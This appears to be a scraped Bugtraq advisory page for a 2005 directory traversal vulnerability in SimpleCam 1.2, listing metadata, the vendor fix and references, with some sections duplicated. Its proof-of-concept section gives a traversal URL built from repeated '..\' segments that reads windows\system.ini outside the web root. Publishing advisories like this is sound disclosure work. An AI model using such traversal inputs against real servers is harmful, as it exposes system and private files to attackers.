SimpleCam Directory Traversal Vulnerability
BID:13495
Info
SimpleCam Directory Traversal Vulnerability
| Bugtraq ID: | 13495 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | May 04 2005 12:00AM |
| Updated: | May 04 2005 12:00AM |
| Credit: | Discovery credited to Donato Ferrante <[email protected]>. |
| Vulnerable: |
Dead Pirate Software SimpleCam 1.2 |
| Not Vulnerable: |
Dead Pirate Software SimpleCam 1.3 |
Discussion
SimpleCam Directory Traversal Vulnerability
SimpleCam is prone to a directory traversal vulnerability that could allow attackers to read files outside the Web root.
SimpleCam is prone to a directory traversal vulnerability that could allow attackers to read files outside the Web root.
Exploit / POC
SimpleCam Directory Traversal Vulnerability
An exploit is not required.
The following example is provided:
http://example.com/..\..\..\..\..\..\..\..\..\..\..\..\windows\system.ini
An exploit is not required.
The following example is provided:
http://example.com/..\..\..\..\..\..\..\..\..\..\..\..\windows\system.ini
Solution / Fix
SimpleCam Directory Traversal Vulnerability
Solution:
The vendor has supplied an update to address this issue:
Dead Pirate Software SimpleCam 1.2
Solution:
The vendor has supplied an update to address this issue:
Dead Pirate Software SimpleCam 1.2
-
Dead Pirate Software simplecam.zip
http://simplecam.fileburst.com/simplecam.zip
References
SimpleCam Directory Traversal Vulnerability
References:
References:
- SimpleCam Homepage (Dead Pirate Software)
- directory traversal in SimpleCam 1.2 ("Donato Ferrante"
)